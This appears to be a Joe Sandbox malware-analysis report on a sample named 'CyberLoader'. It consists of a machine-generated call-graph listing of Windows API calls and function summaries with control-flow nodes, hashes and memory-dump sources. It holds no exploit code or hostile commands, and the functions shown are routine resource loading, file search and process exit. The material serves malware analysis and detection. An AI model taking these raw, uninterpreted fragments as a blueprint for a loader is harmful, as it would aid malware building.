24066->24103 24067->24066 24069->24017 24070->24037 24071->24030 24073 27c9c4 24072->24073 24074 27c9b2 24072->24074 24105 276249 80 API calls 24073->24105 24104 276249 80 API calls 24074->24104 24077 27c9bc 24077->24020 24078->24035 24079->24037 24081 281ad9 24080->24081 24082 281af2 24081->24082 24085 281b06 24081->24085 24106 28075b 84 API calls 24082->24106 24084 281af9 24084->24085 24086->24017 24087->24044 24088->24053 24089->24046 24090->24052 24092 27acf5 GetVersionExW 24091->24092 24093 277dcb 24092->24093 24093->24062 24099 27ca82 __vsnwprintf_l 24094->24099 24095 27cbf7 24096 27cc1f 24095->24096 24097 27ca0b 6 API calls 24095->24097 24098 28067c SetThreadExecutionState RaiseException 24096->24098 24097->24096 24101 27cbee 24098->24101 24099->24095 24100 2884bd 99 API calls 24099->24100 24099->24101 24102 27ab70 84 API calls 24099->24102 24100->24099 24101->24066 24102->24099 24103->24066 24104->24077 24105->24077 24106->24084 24107->23841 24108->23841 24109->23839 24111 275e4a 24110->24111 24155 275d67 24111->24155 24114 275e7d 24115 275eb5 24114->24115 24160 27ad65 CharUpperW CompareStringW 24114->24160 24115->23853 24117 278289 24116->24117 24166 28179d CharUpperW 24117->24166 24119 278333 24119->23856 24121 277d7b 24120->24121 24122 277dbb 24121->24122 24167 277043 74 API calls 24121->24167 24122->23864 24124 277db3 24168 276dc1 74 API calls 24124->24168 24126->23917 24128 279d73 24127->24128 24131 279d82 24127->24131 24129 279d79 FlushFileBuffers 24128->24129 24128->24131 24129->24131 24130 279dfb SetFileTime 24130->23922 24131->24130 24132->23845 24133->23847 24134->23858 24135->23864 24136->23864 24137->23862 24138->23877 24139->23869 24140->23877 24142 279992 GetFileType 24141->24142 24143 27998f 24141->24143 24144 2799a0 24142->24144 24143->23881 24144->23881 24145->23887 24146->23889 24147->23890 24148->23914 24149->23914 24150->23914 24151->23914 24152->23914 24153->23916 24154->23925 24161 275c64 24155->24161 24157 275d88 24157->24114 24159 275c64 2 API calls 24159->24157 24160->24114 24162 275c6e 24161->24162 24163 275d56 24162->24163 24165 27ad65 CharUpperW CompareStringW 24162->24165 24163->24157 24163->24159 24165->24162 24166->24119 24167->24124 24168->24122 24170 27c8db 24169->24170 24175 27a90e 84 API calls 24170->24175 24172 27c90d 24176 27a90e 84 API calls 24172->24176 24174 27c918 24175->24172 24176->24174 24178 27a5fe 24177->24178 24179 27a691 FindNextFileW 24178->24179 24180 27a621 FindFirstFileW 24178->24180 24182 27a6b0 24179->24182 24183 27a69c GetLastError 24179->24183 24181 27a638 24180->24181 24188 27a675 24180->24188 24184 27b66c 2 API calls 24181->24184 24182->24188 24183->24182 24185 27a64d 24184->24185 24186 27a651 FindFirstFileW 24185->24186 24187 27a66a GetLastError 24185->24187 24186->24187 24186->24188 24187->24188 24188->23795 24198 289d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24189->24198 24191 289d21 24193 289d2d 24191->24193 24199 289d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24191->24199 24193->23572 24193->23574 24194->23573 24195->23582 24196->23582 24197->23585 24198->24191 24199->24193 24200->23592 24202 279ef7 76 API calls 24201->24202 24203 271f5b 24202->24203 24204 271f78 24203->24204 24205 2719a6 97 API calls 24203->24205 24204->23601 24204->23602 24206 271f68 24205->24206 24206->24204 24208 276dc1 74 API calls 24206->24208 24208->24204 24210 28acc8 GetDlgItem 24209->24210 24211 28ac8f GetMessageW 24209->24211 24210->23612 24210->23613 24212 28acb4 TranslateMessage DispatchMessageW 24211->24212 24213 28aca5 IsDialogMessageW 24211->24213 24212->24210 24213->24210 24213->24212 24767 28b8e0 93 API calls _swprintf 24768 288ce0 CompareStringW ShowWindow SetWindowTextW GlobalAlloc WideCharToMultiByte 24771 2a16e0 CloseHandle 24216 28e1f9 24217 28e203 24216->24217 24218 28df59 ___delayLoadHelper2@8 19 API calls 24217->24218 24219 28e210 24218->24219 24811 29abfd 6 API calls _ValidateLocalCookies 24813 28ebf7 20 API calls 24774 28eac0 27 API calls pre_c_initialization 24816 29ebc1 21 API calls __vsnwprintf_l 24817 2897c0 10 API calls 24776 299ec0 21 API calls 24818 29b5c0 GetCommandLineA GetCommandLineW 24777 28a8c2 GetDlgItem EnableWindow ShowWindow SendMessageW 24245 2710d5 24250 275bd7 24245->24250 24251 275be1 __EH_prolog 24250->24251 24252 27b07d 82 API calls 24251->24252 24253 275bed 24252->24253 24257 275dcc GetCurrentProcess GetProcessAffinityMask 24253->24257 24779 28acd0 100 API calls 24822 2809d0 82 API calls 24823 2819d0 26 API calls std::bad_exception::bad_exception 24265 28ead2 24266 28eade ___FrameUnwindToState 24265->24266 24291 28e5c7 24266->24291 24268 28eae5 24270 28eb0e 24268->24270 24371 28ef05 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 24268->24371 24278 28eb4d ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24270->24278 24302 29824d 24270->24302 24274 28eb2d ___FrameUnwindToState 24275 28ebad 24310 28f020 24275->24310 24278->24275 24372 297243 38 API calls 2 library calls 24278->24372 24286 28ebd9 24288 28ebe2 24286->24288 24373 29764a 28 API calls _abort 24286->24373 24374 28e73e 13 API calls 2 library calls 24288->24374 24292 28e5d0 24291->24292 24375 28ed5b IsProcessorFeaturePresent 24292->24375 24294 28e5dc 24376 292016 24294->24376 24296 28e5e1 24297 28e5e5 24296->24297 24385 2980d7 24296->24385 24297->24268 24300 28e5fc 24300->24268 24304 298264 24302->24304 24303 28ec4a _ValidateLocalCookies 5 API calls 24305 28eb27 24303->24305 24304->24303 24305->24274 24306 2981f1 24305->24306 24308 298220 24306->24308 24307 28ec4a _ValidateLocalCookies 5 API calls 24309 298249 24307->24309 24308->24307 24309->24278 24435 28f350 24310->24435 24312 28f033 GetStartupInfoW 24313 28ebb3 24312->24313 24314 29819e 24313->24314 24315 29b290 51 API calls 24314->24315 24316 2981a7 24315->24316 24318 28ebbc 24316->24318 24437 29b59a 38 API calls 24316->24437 24319 28d5d4 24318->24319 24438 2800cf 24319->24438 24323 28d5f3 24487 28a335 24323->24487 24325 28d5fc 24491 2813b3 GetCPInfo 24325->24491 24327 28d606 ___scrt_get_show_window_mode 24328 28d619 GetCommandLineW 24327->24328 24329 28d628 24328->24329 24330 28d6a6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 24328->24330 24494 28bc84 24329->24494 24331 27400a _swprintf 51 API calls 24330->24331 24333 28d70d SetEnvironmentVariableW GetModuleHandleW LoadIconW 24331->24333 24505 28aded LoadBitmapW 24333->24505 24336 28d6a0 24499 28d287 24336->24499 24337 28d636 OpenFileMappingW 24340 28d64f MapViewOfFile 24337->24340 24341 28d696 CloseHandle 24337->24341 24343 28d68d UnmapViewOfFile 24340->24343 24344 28d660 __vsnwprintf_l 24340->24344 24341->24330 24343->24341 24348 28d287 2 API calls 24344->24348 24350 28d67c 24348->24350 24349 288835 8 API calls 24351 28d76a DialogBoxParamW 24349->24351 24350->24343 24352 28d7a4 24351->24352 24353 28d7bd 24352->24353 24354 28d7b6 Sleep 24352->24354 24357 28d7cb 24353->24357 24535 28a544 CompareStringW SetCurrentDirectoryW ___scrt_get_show_window_mode 24353->24535 24354->24353 24356 28d7ea DeleteObject 24358 28d7ff DeleteObject 24356->24358 24359 28d806 24356->24359 24357->24356 24358->24359 24360 28d849 24359->24360 24361 28d837 24359->24361 24532 28a39d 24360->24532 24536 28d2e6 6 API calls 24361->24536 24364 28d83d CloseHandle 24364->24360 24365 28d883 24366 29757e GetModuleHandleW 24365->24366 24367 28ebcf 24366->24367 24367->24286 24368 2976a7 24367->24368 24670 297424 24368->24670 24371->24268 24372->24275 24373->24288 24374->24274 24375->24294 24377 29201b ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 24376->24377 24389 29310e 24377->24389 24381 292031 24382 29203c 24381->24382 24403 29314a DeleteCriticalSection 24381->24403 24382->24296 24384 292029 24384->24296 24431 29b73a 24385->24431 24388 29203f 8 API calls 3 library calls 24388->24297 24391 293117 24389->24391 24392 293140 24391->24392 24393 292025 24391->24393 24404 293385 24391->24404 24409 29314a DeleteCriticalSection 24392->24409 24393->24384 24395 29215c 24393->24395 24424 29329a 24395->24424 24397 292171 24397->24381 24398 292166 24398->24397 24429 293348 6 API calls try_get_function 24398->24429 24400 29217f 24401 29218c 24400->24401 24430 29218f 6 API calls ___vcrt_FlsFree 24400->24430 24401->24381 24403->24384 24410 293179 24404->24410 24407 2933bc InitializeCriticalSectionAndSpinCount 24408 2933a8 24407->24408 24408->24391 24409->24393 24411 2931a9 24410->24411 24412 2931ad 24410->24412 24411->24412 24416 2931cd 24411->24416 24417 293219 24411->24417 24412->24407 24412->24408 24414 2931d9 GetProcAddress 24415 2931e9 __crt_fast_encode_pointer 24414->24415 24415->24412 24416->24412 24416->24414 24418 293241 LoadLibraryExW 24417->24418 24419 293236 24417->24419 24420 29325d GetLastError 24418->24420 24423 293275 24418->24423 24419->24411 24422 293268 LoadLibraryExW 24420->24422 24420->24423 24421 29328c FreeLibrary 24421->24419 24422->24423 24423->24419 24423->24421 24425 293179 try_get_function 5 API calls 24424->24425 24426 2932b4 24425->24426 24427 2932cc TlsAlloc 24426->24427 24428 2932bd 24426->24428 24428->24398 24429->24400 24430->24397 24434 29b753 24431->24434 24432 28ec4a _ValidateLocalCookies 5 API calls 24433 28e5ee 24432->24433 24433->24300 24433->24388 24434->24432 24436 28f367 24435->24436 24436->24312 24436->24436 24437->24316 24439 28e360 24438->24439 24440 2800d9 GetModuleHandleW 24439->24440 24441 2800f0 GetProcAddress 24440->24441 24442 280154 24440->24442 24444 280109 24441->24444 24445 280121 GetProcAddress 24441->24445 24443 280484 GetModuleFileNameW 24442->24443 24546 2970dd 42 API calls 2 library calls 24442->24546 24458 2804a3 24443->24458 24444->24445 24445->24442 24446 280133 24445->24446 24446->24442 24448 2803be 24448->24443 24449 2803c9 GetModuleFileNameW CreateFileW 24448->24449 24450 280478 CloseHandle 24449->24450 24451 2803fc SetFilePointer 24449->24451 24450->24443 24451->24450 24452 28040c ReadFile 24451->24452 24452->24450 24454 28042b 24452->24454 24454->24450 24457 280085 2 API calls 24454->24457 24456 2804d2 CompareStringW 24456->24458 24457->24454 24458->24456 24459 280508 GetFileAttributesW 24458->24459 24460 280520 24458->24460 24537 27acf5 24458->24537 24540 280085 24458->24540 24459->24458 24459->24460 24461 28052a 24460->24461 24463 280560 24460->24463 24464 280542 GetFileAttributesW 24461->24464 24466 28055a 24461->24466 24462 28066f 24486 289da4 GetCurrentDirectoryW 24462->24486 24463->24462 24465 27acf5 GetVersionExW 24463->24465 24464->24461 24464->24466 24467 28057a 24465->24467 24466->24463 24468 280581 24467->24468 24469 2805e7 24467->24469 24471 280085 2 API calls 24468->24471 24470 27400a _swprintf 51 API calls 24469->24470 24472 28060f AllocConsole 24470->24472 24473 28058b 24471->24473 24474 28061c GetCurrentProcessId AttachConsole 24472->24474 24475 280667 ExitProcess 24472->24475 24476 280085 2 API calls 24473->24476 24547 2935b3 24474->24547 24478 280595 24476->24478 24480 27ddd1 53 API calls 24478->24480 24479 28063d GetStdHandle WriteConsoleW Sleep FreeConsole 24479->24475 24481 2805b0 24480->24481 24482 27400a _swprintf 51 API calls 24481->24482 24483 2805c3 24482->24483 24484 27ddd1 53 API calls 24483->24484 24485 2805d2 24484->24485 24485->24475 24486->24323 24488 280085 2 API calls 24487->24488 24489 28a349 OleInitialize 24488->24489 24490 28a36c GdiplusStartup SHGetMalloc 24489->24490 24490->24325 24492 2813d7 IsDBCSLeadByte 24491->24492 24492->24492 24493 2813ef 24492->24493 24493->24327 24497 28bc8e 24494->24497 24495 28bda4 24495->24336 24495->24337 24496 28179d CharUpperW 24496->24497 24497->24495 24497->24496 24549 27ecad 80 API calls ___scrt_get_show_window_mode 24497->24549 24500 28e360 24499->24500 24501 28d294 SetEnvironmentVariableW 24500->24501 24502 28d2b7 24501->24502 24503 28d2df 24502->24503 24504 28d2d3 SetEnvironmentVariableW 24502->24504 24503->24330 24504->24503 24506 28ae0e 24505->24506 24507 28ae15 24505->24507 24550 289e1c FindResourceW 24506->24550 24509 28ae2a 24507->24509 24510 28ae1b GetObjectW 24507->24510 24511 289d1a 4 API calls 24509->24511 24510->24509 24512 28ae3d 24511->24512 24513 28ae80 24512->24513 24514 28ae5c 24512->24514 24516 289e1c 12 API calls 24512->24516 24524 27d31c 24513->24524 24564 289d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24514->24564 24518 28ae4d 24516->24518 24517 28ae64 24565 289d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24517->24565 24518->24514 24520 28ae53 DeleteObject 24518->24520 24520->24514 24521 28ae6d 24566 289f5d 8 API calls ___scrt_get_show_window_mode 24521->24566 24523 28ae74 DeleteObject 24523->24513 24575 27d341 24524->24575 24526 27d328 24615 27da4e GetModuleHandleW FindResourceW 24526->24615 24529 288835 24530 28e24a new 8 API calls 24529->24530 24531 288854 24530->24531 24531->24349 24533 28a3cc GdiplusShutdown OleUninitialize 24532->24533 24533->24365 24535->24357 24536->24364 24538 27ad09 GetVersionExW 24537->24538 24539 27ad45 24537->24539 24538->24539 24539->24458 24541 28e360 24540->24541 24542 280092 GetSystemDirectoryW 24541->24542 24543 2800c8 24542->24543 24544 2800aa 24542->24544 24543->24458 24545 2800bb LoadLibraryW 24544->24545 24545->24543 24546->24448 24548 2935bb 24547->24548 24548->24479 24548->24548 24549->24497 24551 289e3e SizeofResource 24550->24551 24552 289e70 24550->24552 24551->24552 24553 289e52 LoadResource 24551->24553 24552->24507 24553->24552 24554 289e63 LockResource 24553->24554 24554->24552 24555 289e77 GlobalAlloc 24554->24555 24555->24552 24556 289e92 GlobalLock 24555->24556 24557 289f21 GlobalFree 24556->24557 24558 289ea1 __vsnwprintf_l 24556->24558 24557->24552 24559 289f1a GlobalUnlock 24558->24559 24567 289d7b GdipAlloc 24558->24567 24559->24557 24562 289f05 24562->24559 24563 289eef GdipCreateHBITMAPFromBitmap 24563->24562 24564->24517 24565->24521 24566->24523 24568 289d9a 24567->24568 24569 289d8d 24567->24569 24568->24559 24568->24562 24568->24563 24571 289b0f 24569->24571 24572 289b30 GdipCreateBitmapFromStreamICM 24571->24572 24573 289b37 GdipCreateBitmapFromStream 24571->24573 24574 289b3c 24572->24574 24573->24574 24574->24568 24576 27d34b _wcschr __EH_prolog 24575->24576 24577 27d37a GetModuleFileNameW 24576->24577 24578 27d3ab 24576->24578 24579 27d394 24577->24579 24617 2799b0 24578->24617 24579->24578 24581 279653 79 API calls 24583 27d7ab 24581->24583 24582 27d407 24628 295a90 26 API calls 3 library calls 24582->24628 24583->24526 24584 283781 76 API calls 24586 27d3db 24584->24586 24586->24582 24586->24584 24600 27d627 24586->24600 24587 27d41a 24629 295a90 26 API calls 3 library calls 24587->24629 24589 27d563 24589->24600 24647 279d30 77 API calls 24589->24647 24593 27d57d new 24594 279bf0 80 API calls 24593->24594 24593->24600 24597 27d5a6 new 24594->24597 24596 27d42c 24596->24589 24596->24600 24630 279e40 24596->24630 24638 279bf0 24596->24638 24646 279d30 77 API calls 24596->24646 24599 27d5b2 new 24597->24599 24597->24600 24648 28137a MultiByteToWideChar 24597->24648 24599->24600 24601 27d72b 24599->24601 24603 27da0a 24599->24603 24605 27d9fa 24599->24605 24612 281596 WideCharToMultiByte 24599->24612 24652 27dd6b 50 API calls __vsnprintf 24599->24652 24653 2958d9 26 API calls 3 library calls 24599->24653 24600->24581 24649 27ce72 76 API calls 24601->24649 24654 27ce72 76 API calls 24603->24654 24605->24526 24606 27d771 24650 295a90 26 API calls 3 library calls 24606->24650 24607 27d742 24607->24606 24610 283781 76 API calls 24607->24610 24609 27d78b 24651 295a90 26 API calls 3 library calls 24609->24651 24610->24607 24612->24599 24616 27d32f 24615->24616 24616->24529 24618 2799ba 24617->24618 24619 279a39 CreateFileW 24618->24619 24620 279a59 GetLastError 24619->24620 24625 279aaa 24619->24625 24621 27b66c 2 API calls 24620->24621 24623 279a79 24621->24623 24622 279ac7 SetFileTime 24626 279ae1 24622->24626 24624 279a7d CreateFileW GetLastError 24623->24624 24623->24625 24627 279aa1 24624->24627 24625->24622 24625->24626 24626->24586 24627->24625 24628->24587 24629->24596 24631 279e64 SetFilePointer 24630->24631 24632 279e53 24630->24632 24633 279e9d 24631->24633 24634 279e82 GetLastError 24631->24634 24632->24633 24655 276fa5 75 API calls 24632->24655 24633->24596 24634->24633 24636 279e8c 24634->24636 24636->24633 24656 276fa5 75 API calls 24636->24656 24640 279bfc 24638->24640 24642 279c03 24638->24642 24640->24596 24641 279c9e 24641->24640 24669 276f6b 75 API calls 24641->24669 24642->24640 24642->24641 24644 279cc0 24642->24644 24657 27984e 24642->24657 24644->24640 24645 27984e 5 API calls 24644->24645 24645->24644 24646->24596 24647->24593 24648->24599 24649->24607 24650->24609 24651->24600 24652->24599 24653->24599 24654->24605 24655->24631 24656->24633 24658 279867 ReadFile 24657->24658 24659 27985c GetStdHandle 24657->24659 24660 279880 24658->24660 24664 2798a0 24658->24664 24659->24658 24661 279989 GetFileType 24660->24661 24662 279887 24661->24662 24663 2798a8 GetLastError 24662->24663 24665 2798b7 24662->24665 24666 279895 24662->24666 24663->24664 24663->24665 24664->24642 24665->24664 24667 2798c7 GetLastError 24665->24667 24668 27984e GetFileType 24666->24668 24667->24664 24667->24666 24668->24664 24669->24640 24671 297430 _abort 24670->24671 24672 297448 24671->24672 24674 29757e _abort GetModuleHandleW 24671->24674 24692 29a3f1 EnterCriticalSection 24672->24692 24675 29743c 24674->24675 24675->24672 24704 2975c2 GetModuleHandleExW 24675->24704 24676 2974ee 24693 29752e 24676->24693 24680 2974c5 24681 2974dd 24680->24681 24686 2981f1 _abort 5 API calls 24680->24686 24687 2981f1 _abort 5 API calls 24681->24687 24682 297450 24682->24676 24682->24680 24712 297f30 20 API calls _abort 24682->24712 24683 29750b 24696 29753d 24683->24696 24684 297537 24713 2a1a19 5 API calls _ValidateLocalCookies 24684->24713 24686->24681 24687->24676 24692->24682 24714 29a441 LeaveCriticalSection 24693->24714 24695 297507 24695->24683 24695->24684 24715 29a836 24696->24715 24699 29756b 24702 2975c2 _abort 8 API calls 24699->24702 24700 29754b GetPEB 24700->24699 24701 29755b GetCurrentProcess TerminateProcess 24700->24701 24701->24699 24703 297573 ExitProcess 24702->24703 24705 2975ec GetProcAddress 24704->24705 24706 29760f 24704->24706 24711 297601 24705->24711 24707 29761e 24706->24707 24708 297615 FreeLibrary 24706->24708 24709 28ec4a _ValidateLocalCookies 5 API calls 24707->24709 24708->24707 24710 297628 24709->24710 24710->24672 24711->24706 24712->24680 24714->24695 24716 29a85b 24715->24716 24720 29a851 24715->24720 24717 29a458 _abort 5 API calls 24716->24717 24717->24720 24718 28ec4a _ValidateLocalCookies 5 API calls 24719 297547 24718->24719 24719->24699 24719->24700 24720->24718

                                                  Executed Functions

                                                  Function 00289E1C Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 100memorywindowCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 770 289e1c-289e38 FindResourceW 771 289e3e-289e50 SizeofResource 770->771 772 289f2f-289f32 770->772 773 289e70-289e72 771->773 774 289e52-289e61 LoadResource 771->774 776 289f2e 773->776 774->773 775 289e63-289e6e LockResource 774->775 775->773 777 289e77-289e8c GlobalAlloc 775->777 776->772 778 289f28-289f2d 777->778 779 289e92-289e9b GlobalLock 777->779 778->776 780 289f21-289f22 GlobalFree 779->780 781 289ea1-289ebf call 28f4b0 779->781 780->778 785 289f1a-289f1b GlobalUnlock 781->785 786 289ec1-289ee3 call 289d7b 781->786 785->780 786->785 791 289ee5-289eed 786->791 792 289f08-289f16 791->792 793 289eef-289f03 GdipCreateHBITMAPFromBitmap 791->793 792->785 793->792 794 289f05 793->794 794->792
                                                  APIs
                                                  • FindResourceW.KERNEL32(0028AE4D,PNG,?,?,?,0028AE4D,00000066), ref: 00289E2E
                                                  • SizeofResource.KERNEL32(00000000,00000000,?,?,?,0028AE4D,00000066), ref: 00289E46
                                                  • LoadResource.KERNEL32(00000000,?,?,?,0028AE4D,00000066), ref: 00289E59
                                                  • LockResource.KERNEL32(00000000,?,?,?,0028AE4D,00000066), ref: 00289E64
                                                  • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0028AE4D,00000066), ref: 00289E82
                                                  • GlobalLock.KERNEL32 ref: 00289E93
                                                  • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00289EFC
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00289F1B
                                                  • GlobalFree.KERNEL32 ref: 00289F22
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: GlobalResource$Lock$AllocBitmapCreateFindFreeFromGdipLoadSizeofUnlock
                                                  • String ID: PNG
                                                  • API String ID: 4097654274-364855578
                                                  • Opcode ID: aa189344661eb95369fc0a4dd906071331d2dafc0d77162ec47878a72e6ee9c5
                                                  • Instruction ID: 3fb2acb1840b0bc6f6e72e211b881a2ed277698c71d9ee701f71a562515c9da9
                                                  • Opcode Fuzzy Hash: aa189344661eb95369fc0a4dd906071331d2dafc0d77162ec47878a72e6ee9c5
                                                  • Instruction Fuzzy Hash: 6A317075215306ABC711AF61EC4CA2BBBA9FF96751B080529F906D22A0DF32DC50CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0027A5F4 Relevance: 7.6, APIs: 5, Instructions: 107fileCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 971 27a5f4-27a61f call 28e360 974 27a691-27a69a FindNextFileW 971->974 975 27a621-27a632 FindFirstFileW 971->975 978 27a6b0-27a6b2 974->978 979 27a69c-27a6aa GetLastError 974->979 976 27a6b8-27a75c call 27fe56 call 27bcfb call 280e19 * 3 975->976 977 27a638-27a64f call 27b66c 975->977 980 27a761-27a774 976->980 986 27a651-27a668 FindFirstFileW 977->986 987 27a66a-27a673 GetLastError 977->987 978->976 978->980 979->978 986->976 986->987 989 27a675-27a678 987->989 990 27a684 987->990 989->990 992 27a67a-27a67d 989->992 993 27a686-27a68c 990->993 992->990 995 27a67f-27a682 992->995 993->980 995->993
                                                  APIs
                                                  • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0027A4EF,000000FF,?,?), ref: 0027A628
                                                  • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0027A4EF,000000FF,?,?), ref: 0027A65E
                                                  • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0027A4EF,000000FF,?,?), ref: 0027A66A
                                                  • FindNextFileW.KERNEL32(?,?,?,?,?,?,0027A4EF,000000FF,?,?), ref: 0027A692
                                                  • GetLastError.KERNEL32(?,?,?,?,0027A4EF,000000FF,?,?), ref: 0027A69E
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: FileFind$ErrorFirstLast$Next
                                                  • String ID:
                                                  • API String ID: 869497890-0
                                                  • Opcode ID: c0cafa512ee101cc9bb812b0bef81d88dd41560bd37b50e0225b90e31c3eae97
                                                  • Instruction ID: 21e167e471c5a40365107961ceae66438b98e3b2e382b107d5d8bb768994f7fb
                                                  • Opcode Fuzzy Hash: c0cafa512ee101cc9bb812b0bef81d88dd41560bd37b50e0225b90e31c3eae97
                                                  • Instruction Fuzzy Hash: 8B419176515242AFC724EF28C884ADEF7ECBF89350F044A2AF59DD3240D774A9648F92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0029753D Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(00000000,?,00297513,00000000,002ABAD8,0000000C,0029766A,00000000,00000002,00000000), ref: 0029755E
                                                  • TerminateProcess.KERNEL32(00000000,?,00297513,00000000,002ABAD8,0000000C,0029766A,00000000,00000002,00000000), ref: 00297565
                                                  • ExitProcess.KERNEL32 ref: 00297577
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: Process$CurrentExitTerminate
                                                  • String ID:
                                                  • API String ID: 1703294689-0
                                                  • Opcode ID: 0071dfc4292b61e9ace86f7aa23c012f31673707f43ad60ccb106156aa06c205
                                                  • Instruction ID: 3d5b51f36f4201159139358c16ad867fad38a0cabc26b9f3434b068799cd22c1
                                                  • Opcode Fuzzy Hash: 0071dfc4292b61e9ace86f7aa23c012f31673707f43ad60ccb106156aa06c205
                                                  • Instruction Fuzzy Hash: 52E0B631124A48ABCF51EF64ED0DA493B69EB52741F518414FD098A222DF35DE62DA90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0027857B Relevance: 3.9, APIs: 2, Instructions: 947COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: H_prolog_memcmp
                                                  • String ID:
                                                  • API String ID: 3004599000-0
                                                  • Opcode ID: f1e45affac610e462e6118726d81c3dfd74faa67a07a01eb57e30f77c12c11f4
                                                  • Instruction ID: 63e7d0e947aa548d4f6019adcc89f9b24a17ae99160553489354540a52b34221
                                                  • Opcode Fuzzy Hash: f1e45affac610e462e6118726d81c3dfd74faa67a07a01eb57e30f77c12c11f4
                                                  • Instruction Fuzzy Hash: 93821D70964246AEDF25DF74C489BFAB7A9AF05300F08C1B9ED4D9B142DB305AA4CB61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028AEE0 Relevance: 98.7, APIs: 47, Strings: 9, Instructions: 724COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 0028AEE5
                                                    • Part of subcall function 0027130B: GetDlgItem.USER32(00000000,00003021), ref: 0027134F
                                                    • Part of subcall function 0027130B: SetWindowTextW.USER32(00000000,002A35B4), ref: 00271365
                                                  Strings
